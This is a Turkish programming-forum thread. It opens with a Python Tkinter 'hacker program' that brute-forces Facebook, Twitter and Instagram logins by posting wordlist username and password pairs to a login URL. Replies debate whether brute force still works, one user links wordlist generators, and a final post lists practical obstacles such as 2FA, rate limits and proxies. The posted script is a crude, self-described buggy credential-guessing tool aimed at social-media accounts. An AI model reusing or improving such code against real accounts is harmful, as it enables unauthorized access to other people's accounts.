Python'da bruteforce attack

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from tkinter import *
from tkMessageBox import *
import time
from itertools import product
import requests
import sys

def facebookhackcodes():
	
	expression = "incorrect"
	# The link of the website
	url = XUrl.get()
	# The userfield in the form of the login
	userfile = XUser.get()
	# The passwordfield in the form
	passwordfile = XPassword.get()
	# list of potential incorrect message in the page if it doesn't succeed
	incorrectMessage = ['error', 'required error']
	# list of potential success message in the page if it succeed
	successMessage = ['success', 'SUCCESS']
	# Getting list of potentials password
	passwords = open('' + passwordfile ).readlines()
	# Getting list of user to test with
	users = open( '' + userfile ).readlines()
	
	PenFacebookHackCodes = Toplevel(ana)
	PenFacebookHackCodes.transient(ana)
	PenFacebookHackCodes.focus()
	PenFacebookHackCodes.title(u"Facbook Hack Codes Program─▒")
	PenFacebookHackCodes.resizable(width=FALSE, height=FALSE)
	pgen = 1000
	pyuks = 650
	ekrangen = PenFacebookHackCodes.winfo_screenwidth()
	ekranyuks = PenFacebookHackCodes.winfo_screenheight()
	x = (ekrangen - pgen) / 2
	y = (ekranyuks - pyuks) / 2
	PenFacebookHackCodes.geometry("%dx%d+%d+%d"%(pgen, pyuks, x, y))
	#-URL ADRES
	Label(PenFacebookHackCodes, text=u"Url Adresi : " + url).grid(row=1, sticky=W)
	#-USER F─░LE ADRES
	Label(PenFacebookHackCodes, text=u"User Dosya Ad─▒ : " + userfile).grid(row=2, sticky=W)
	#-PASSWORD F─░LE ADRES
	Label(PenFacebookHackCodes, text=u"Password Dosya Ad─▒ : " + passwordfile).grid(row=3, sticky=W)
	Label(PenFacebookHackCodes, text=u"---------------------------------------------------------------").grid(row=4, sticky=W)
	Label(PenFacebookHackCodes, text=u"Connection Url Adress : " + url ).grid(row=5, sticky=W)
	Label(PenFacebookHackCodes, text=u"---------------------------------------------------------------").grid(row=6, sticky=W)
	for user in users:
		for password in passwords:
			data = {'username':user,'password':password}
			r = requests.post(url,data=data)
			if expression not in r.content :
				Label(PenFacebookHackCodes, text=u"---------------------------------------------------------------").grid(row=7, sticky=W)	
				Label(PenFacebookHackCodes, text=u"FOUND Username:" + user + "FOUND Password : " + password).grid(row=8, sticky=W)
				Label(PenFacebookHackCodes, text=u"---------------------------------------------------------------").grid(row=9, sticky=W)
				showinfo("┼×─░FRE BULUNDU", "FOUND Username : " + user + "FOUND Password : " + password)
				break
				break
			else:
				print r.content," ",password
					
def facebookhack():	
	PenFacebookHack = Toplevel(ana)
	PenFacebookHack.transient(ana)
	PenFacebookHack.focus()
	PenFacebookHack.title(u"Facebook Hack Program─▒")
	PenFacebookHack.resizable(width=FALSE, height=FALSE)
	pgen = 1000
	pyuks = 650
	ekrangen = PenFacebookHack.winfo_screenwidth()
	ekranyuks = PenFacebookHack.winfo_screenheight()
	x = (ekrangen - pgen) / 2
	y = (ekranyuks - pyuks) / 2
	PenFacebookHack.geometry("%dx%d+%d+%d"%(pgen, pyuks, x, y))
	#-URL ADRES
	global XUrl
	XUrl = StringVar()
	Label(PenFacebookHack, text=u"Url Adresi Yaz─▒n─▒z : ").grid(row=1, sticky=W)
	Url=Entry(PenFacebookHack,textvariable=XUrl).grid(row=1, column=1)
	#-USER F─░LE ADRES
	global XUser
	XUser = StringVar()
	Label(PenFacebookHack, text=u"User Dosya ADresi Giriniz : ").grid(row=2, sticky=W)
	User=Entry(PenFacebookHack,textvariable=XUser).grid(row=2, column=1)
	#-PASSWORD F─░LE ADRES
	global XPassword
	XPassword = StringVar()
	Label(PenFacebookHack, text=u"Password Dosya ADresi Giriniz : ").grid(row=3, sticky=W)
	Password=Entry(PenFacebookHack,textvariable=XPassword).grid(row=3, column=1)
	#BUTTON
	BtKaydet=Button(PenFacebookHack, text=u"Sald─▒r─▒y─▒ Ba┼člat", command=facebookhackcodes).grid(row=4, column=1, sticky=NSEW, pady=3)
	BtKaydet=Button(PenFacebookHack, text=u"Sald─▒r─▒y─▒ ─░ptal Et", command=ana.quit).grid(row=4, column=2, sticky=NSEW, pady=3)

def twitterhackcodes():
	
	expression = "incorrect"
	# The link of the website
	url = XUrl.get()
	# The userfield in the form of the login
	userfile = XUser.get()
	# The passwordfield in the form
	passwordfile = XPassword.get()
	# list of potential incorrect message in the page if it doesn't succeed
	incorrectMessage = ['error', 'required error']
	# list of potential success message in the page if it succeed
	successMessage = ['success', 'SUCCESS']
	# Getting list of potentials password
	passwords = open('' + passwordfile ).readlines()
	# Getting list of user to test with
	users = open( '' + userfile ).readlines()
	
	PenTwitterHackCodes = Toplevel(ana)
	PenTwitterHackCodes.transient(ana)
	PenTwitterHackCodes.focus()
	PenTwitterHackCodes.title(u"Twitter Hack Codes Program─▒")
	PenTwitterHackCodes.resizable(width=FALSE, height=FALSE)
	pgen = 1000
	pyuks = 650
	ekrangen = PenTwitterHackCodes.winfo_screenwidth()
	ekranyuks = PenTwitterHackCodes.winfo_screenheight()
	x = (ekrangen - pgen) / 2
	y = (ekranyuks - pyuks) / 2
	PenTwitterHackCodes.geometry("%dx%d+%d+%d"%(pgen, pyuks, x, y))
	#-URL ADRES
	Label(PenTwitterHackCodes, text=u"Url Adresi : " + url).grid(row=1, sticky=W)
	#-USER F─░LE ADRES
	Label(PenTwitterHackCodes, text=u"User Dosya Ad─▒ : " + userfile).grid(row=2, sticky=W)
	#-PASSWORD F─░LE ADRES
	Label(PenTwitterHackCodes, text=u"Password Dosya Ad─▒ : " + passwordfile).grid(row=3, sticky=W)
	Label(PenTwitterHackCodes, text=u"---------------------------------------------------------------").grid(row=4, sticky=W)
	Label(PenTwitterHackCodes, text=u"Connection Url Adress : " + url ).grid(row=5, sticky=W)
	Label(PenTwitterHackCodes, text=u"---------------------------------------------------------------").grid(row=6, sticky=W)
	for user in users:
		for password in passwords:
			data = {'username':user,'password':password}
			r = requests.post(url,data=data)
			if expression not in r.content :
				Label(PenTwitterHackCodes, text=u"---------------------------------------------------------------").grid(row=7, sticky=W)	
				Label(PenTwitterHackCodes, text=u"FOUND Username:" + user + "FOUND Password : " + password).grid(row=8, sticky=W)
				Label(PenTwitterHackCodes, text=u"---------------------------------------------------------------").grid(row=9, sticky=W)
				showinfo("┼×─░FRE BULUNDU", "FOUND Username : " + user + "FOUND Password : " + password)
				break
				break
			else:
				print r.content," ",password
					
def twitterhack():	
	PenTwitterrHack = Toplevel(ana)
	PenTwitterrHack.transient(ana)
	PenTwitterrHack.focus()
	PenTwitterrHack.title(u"Twitter Hack Program─▒")
	PenTwitterrHack.resizable(width=FALSE, height=FALSE)
	pgen = 1000
	pyuks = 650
	ekrangen = PenTwitterrHack.winfo_screenwidth()
	ekranyuks = PenTwitterrHack.winfo_screenheight()
	x = (ekrangen - pgen) / 2
	y = (ekranyuks - pyuks) / 2
	PenTwitterrHack.geometry("%dx%d+%d+%d"%(pgen, pyuks, x, y))
	#-URL ADRES
	global XUrl
	XUrl = StringVar()
	Label(PenTwitterrHack, text=u"Url Adresi Yaz─▒n─▒z : ").grid(row=1, sticky=W)
	Url=Entry(PenTwitterrHack,textvariable=XUrl).grid(row=1, column=1)
	#-USER F─░LE ADRES
	global XUser
	XUser = StringVar()
	Label(PenTwitterrHack, text=u"User Dosya ADresi Giriniz : ").grid(row=2, sticky=W)
	User=Entry(PenTwitterrHack,textvariable=XUser).grid(row=2, column=1)
	#-PASSWORD F─░LE ADRES
	global XPassword
	XPassword = StringVar()
	Label(PenTwitterrHack, text=u"Password Dosya ADresi Giriniz : ").grid(row=3, sticky=W)
	Password=Entry(PenTwitterrHack,textvariable=XPassword).grid(row=3, column=1)
	#BUTTON
	BtKaydet=Button(PenTwitterrHack, text=u"Sald─▒r─▒y─▒ Ba┼člat", command=twitterhackcodes).grid(row=4, column=1, sticky=NSEW, pady=3)
	BtKaydet=Button(PenTwitterrHack, text=u"Sald─▒r─▒y─▒ ─░ptal Et", command=ana.quit).grid(row=4, column=2, sticky=NSEW, pady=3)


def instagramhackcodes():
	
	expression = "incorrect"
	# The link of the website
	url = XUrl.get()
	# The userfield in the form of the login
	userfile = XUser.get()
	# The passwordfield in the form
	passwordfile = XPassword.get()
	# list of potential incorrect message in the page if it doesn't succeed
	incorrectMessage = ['error', 'required error']
	# list of potential success message in the page if it succeed
	successMessage = ['success', 'SUCCESS']
	# Getting list of potentials password
	passwords = open('' + passwordfile ).readlines()
	# Getting list of user to test with
	users = open( '' + userfile ).readlines()
	
	PenInstagramHackCodes = Toplevel(ana)
	PenInstagramHackCodes.transient(ana)
	PenInstagramHackCodes.focus()
	PenInstagramHackCodes.title(u"─░nstagram Hack Codes Program─▒")
	PenInstagramHackCodes.resizable(width=FALSE, height=FALSE)
	pgen = 1000
	pyuks = 650
	ekrangen = PenInstagramHackCodes.winfo_screenwidth()
	ekranyuks = PenInstagramHackCodes.winfo_screenheight()
	x = (ekrangen - pgen) / 2
	y = (ekranyuks - pyuks) / 2
	PenInstagramHackCodes.geometry("%dx%d+%d+%d"%(pgen, pyuks, x, y))
	#-URL ADRES
	Label(PenInstagramHackCodes, text=u"Url Adresi : " + url).grid(row=1, sticky=W)
	#-USER F─░LE ADRES
	Label(PenInstagramHackCodes, text=u"User Dosya Ad─▒ : " + userfile).grid(row=2, sticky=W)
	#-PASSWORD F─░LE ADRES
	Label(PenInstagramHackCodes, text=u"Password Dosya Ad─▒ : " + passwordfile).grid(row=3, sticky=W)
	Label(PenInstagramHackCodes, text=u"---------------------------------------------------------------").grid(row=4, sticky=W)
	Label(PenInstagramHackCodes, text=u"Connection Url Adress : " + url ).grid(row=5, sticky=W)
	Label(PenInstagramHackCodes, text=u"---------------------------------------------------------------").grid(row=6, sticky=W)
	for user in users:
		for password in passwords:
			data = {'username':user,'password':password}
			r = requests.post(url,data=data)
			if expression not in r.content :
				Label(PenInstagramHackCodes, text=u"---------------------------------------------------------------").grid(row=7, sticky=W)	
				Label(PenInstagramHackCodes, text=u"FOUND Username:" + user + "FOUND Password : " + password).grid(row=8, sticky=W)
				Label(PenInstagramHackCodes, text=u"---------------------------------------------------------------").grid(row=9, sticky=W)
				showinfo("┼×─░FRE BULUNDU", "FOUND Username : " + user + "FOUND Password : " + password)
				break
				break
			else:
				print r.content," ",password
					
def instagramhack():	
	PenInstagramHack = Toplevel(ana)
	PenInstagramHack.transient(ana)
	PenInstagramHack.focus()
	PenInstagramHack.title(u"─░nstagram Hack Program─▒")
	PenInstagramHack.resizable(width=FALSE, height=FALSE)
	pgen = 1000
	pyuks = 650
	ekrangen = PenInstagramHack.winfo_screenwidth()
	ekranyuks = PenInstagramHack.winfo_screenheight()
	x = (ekrangen - pgen) / 2
	y = (ekranyuks - pyuks) / 2
	PenInstagramHack.geometry("%dx%d+%d+%d"%(pgen, pyuks, x, y))
	#-URL ADRES
	global XUrl
	XUrl = StringVar()
	Label(PenInstagramHack, text=u"Url Adresi Yaz─▒n─▒z : ").grid(row=1, sticky=W)
	Url=Entry(PenInstagramHack,textvariable=XUrl).grid(row=1, column=1)
	#-USER F─░LE ADRES
	global XUser
	XUser = StringVar()
	Label(PenInstagramHack, text=u"User Dosya ADresi Giriniz : ").grid(row=2, sticky=W)
	User=Entry(PenInstagramHack,textvariable=XUser).grid(row=2, column=1)
	#-PASSWORD F─░LE ADRES
	global XPassword
	XPassword = StringVar()
	Label(PenInstagramHack, text=u"Password Dosya ADresi Giriniz : ").grid(row=3, sticky=W)
	Password=Entry(PenInstagramHack,textvariable=XPassword).grid(row=3, column=1)
	#BUTTON
	BtKaydet=Button(PenInstagramHack, text=u"Sald─▒r─▒y─▒ Ba┼člat", command=instagramhackcodes).grid(row=4, column=1, sticky=NSEW, pady=3)
	BtKaydet=Button(PenInstagramHack, text=u"Sald─▒r─▒y─▒ ─░ptal Et", command=ana.quit).grid(row=4, column=2, sticky=NSEW, pady=3)

ana = Tk()

baslik = ana.title("Beyaz ┼×apkal─▒ Hacker Program─▒")

pgen = 1000
pyuks = 650
ekrangen = ana.winfo_screenwidth()
ekranyuks = ana.winfo_screenheight()
x = (ekrangen - pgen) / 2
y = (ekranyuks - pyuks) / 2
ana.geometry("%dx%d+%d+%d"%(pgen, pyuks, x, y))

menubar=Menu(ana)
dosya=Menu(menubar)
menubar.add_cascade(label="Hack Programlar─▒",menu=dosya)
dosya.add_command(label="Port Tarama Program─▒")
dosya.add_command(label="Wifi Hack Program─▒")
dosya.add_command(label="Facebook Hack Program─▒",command=facebookhack)
dosya.add_command(label="Tiwiter Hack Program─▒",command=twitterhack)
dosya.add_command(label="─░nstagram Hack Program─▒",command=instagramhack)
dosya.add_command(label="├ç─▒k─▒┼č",command=ana.quit)

ana.config(menu=menubar)
ana.mainloop()

nas─▒l bir hata var ├ž├Âzemedim ┼čifresi olmayan─▒da do─čru g├Âsteriyor olan─▒da

Bunun la kimse u─čra┼čmaz da neden bunu kullanmaya ├žal─▒┼č─▒yosun ki milyartane brute-force porgram─▒ varken ?

kusura bakmay─▒n ama benim amac─▒m grafiksel bir hack program─▒ yapmakt─▒ ve bunu ba┼čarmamada az kald─▒

1 Be─čeni

Grafik aray├╝zl├╝ olmas─▒n─▒n bi gere─či yok ┼čahsi g├Âr├╝┼č├╝m.bu seni yava┼člat─▒r.hadi oldu yapt─▒n diyelim.Brute-force yapmas─▒ o kadar kolay bi┼čey de─čil.en basitinden ├žo─ču modem ler bile 5 denemeden sonra bilmem ka├ž saatlik ban at─▒yo.t├╝m bunlar─▒ bi kenara b─▒rak─▒p her┼čey oldu haz─▒r program ├žal─▒┼č─▒yo falan filan.wordlist ??? wordlist haz─▒rlamak bilgi toplamak netten buldu─čun wordlistler bi i┼če yaramaz.ki┼či ├╝st├╝nden wordlist haz─▒rlayacaks─▒n.falan filan inter milan.

Bruteforce eskidi bu kadar u─čra┼čt─▒─č─▒na deymez

Eskidi─činden kast─▒n nedir ?

harbi eskididen kast─▒n nedir brute force hala yo─čun olarak kullan─▒l─▒yor ve insanlar hala ┼čifrelerini k─▒r─▒labilir bir┼čey yapt─▒─č─▒ i├žin etkili bir y├Ântem

brute force asla eskimez

├žok basit bir ├Ârnek dizin taramas─▒ yap─▒caks─▒n diyelim brute force yapmadan nas─▒ yap─▒caks─▒n ├žok merak ediyorum. eskidiyse yeni sini anlat bilelim.

Bunu sorman gereksiz asl─▒nda, ki┼či yapmak istiyorsa yapar zaten , piyasada milyar tane ├že┼čitli ├že┼čitli program var hangi fikir yap─▒lmam─▒┼č ki?
┼×imdi ayn─▒ t├╝rde ba┼čka programlar var diye hi├ž bir proje yapmayal─▒m mi ayr─▒ca ├žocu─čun sorusuna de─čil yapma amac─▒na takmissiniz

Yapmak istiyosa yaps─▒n ben yapmas─▒n m─▒ dedim ├žok bo┼č muhabbet d├Ân├╝yo. ozaman her kulland─▒─č─▒n─▒ kendin yap ba┼čkas─▒n─▒n yapt─▒─č─▒n─▒ kullanma ? haz─▒r─▒ var zaten ne gerek var ba┼čtan yapmaya diyorum nas─▒l ├žal─▒┼čt─▒─č─▒n─▒ gitsin ├Â─črensin ? nerdeyse 1 sene olucak bu konuyu a├žt─▒─č─▒ndan beri hani kim sorunu ├ž├Âzmeye u─čra┼čt─▒? kimse u─čra┼čmaz dedim. sende arkada┼č─▒n sorusuna de─čil benim verdi─čim cevaba takm─▒┼čs─▒n ? 3 evetle u─čurluyorum seni.

Hi├žbir zaman kap─▒y─▒ k─▒rarak evi basmak eskimemi┼čtir.

ben bir s├╝r├╝ wordlist olu┼čturma program─▒ haz─▒rlad─▒m bunlar─▒ githubda yay─▒mlad─▒m
i┼čte linki : https://github.com/egeisli
burada bir s├╝r├╝ wordlist var bunlar─▒ kullanabilirsiniz

reis bana instadan ula┼č─▒rm─▒s─▒n ad─▒m sadekufte.1

bruteforce neden yap─▒lmaz, k─▒smen yap─▒lamaz basit├že a├ž─▒klayal─▒m.

Bruteforce, bir ┼čifre veya ┼čifrelenmi┼č veriyi ├ž├Âzmek veya eri┼čmek i├žin t├╝m olas─▒ kombinasyonlar─▒ deneyerek ba┼čar─▒l─▒ bir sonu├ž elde etmeye ├žal─▒┼čan bir sald─▒r─▒ y├Ântemidir.

Biz ilgili bir platformdaki hedef hesab─▒n ┼čifresini ├ž├Âzmeye ├žal─▒┼čt─▒─č─▒m─▒ var sayarsak;

1- g├╝ncel t├╝m sosyal medya plaftormlar─▒nda 2fa deste─či mevcut hesab─▒n ┼čifresini bulsak bile tak─▒lmayaca─č─▒m─▒z─▒n garantisi yok .

2- bir ├žok plaftorm da belirli bir rate limit var bu limiti ge├žince sizi sistemden banlar ve siz halen ┼čifre denedi─činizi zannedersiniz.

3- proxy 2. madde de de─čindi─čim gibi rate limite yakalanmamak i├žin proxy kullanman─▒z gerekmektedir ve free proxyler ile bunu yapamayaca─č─▒m─▒z i├žin ya mobil proxy yada ipv6 gibi maliyeti y├╝ksek olan (├Âzellikle dolar bazl─▒ fiyatlar) proxyler kullanmak gerekti─či i├žin hesap ├žok de─čerli de─čilse zarardan ba┼čka bir ┼čey olmad─▒─č─▒ gibi 4. maddede de─čildi─čim ├╝zere zaman kayb─▒d─▒r.

4- hit atlama , siz ne kadar kaliteli proxy kullansan─▒z da , ne kadar sa─člam keywords/combolistiniz olsa da ┼čifreyi bulsan─▒z bile bulmad─▒ olarak i┼čaretlemesi ihtimalide vard─▒r.

5- farkl─▒ lokasyondan oturum a├žma , bir ├žok sosyal medya platformunda ├Ârnek vermek gerekirse benim deneyimledi─čim discord ve instagram farkl─▒ bir lokasyon da oturum a├ž─▒ld─▒─č─▒ zaman mail veya telefon gibi ikinici bir ├Ânlemle kullan─▒c─▒n─▒n ger├žekten hesap sahibi olup olmad─▒─č─▒n─▒ do─črulamakta.

6- combolistler , AnkaraMessi_Joo24 gibi bir ┼čifre hi├ž bir haz─▒r wordlistte bulunmaz sa├žma ama kolay bir ┼čifre sizi ayn─▒ noktada sayman─▒za neden olur hi├ž bir zamanda o ┼čifreyi bulamazs─▒n─▒z

7- platformdan platforma de─či┼čen bir ├žok g├╝venlik ├Ânlemi mevcuttur.

BruteForce mant─▒kl─▒ de─čildir ve yukar─▒daki maddelere istinaden k─▒smen YA-PI-LA-MAZ.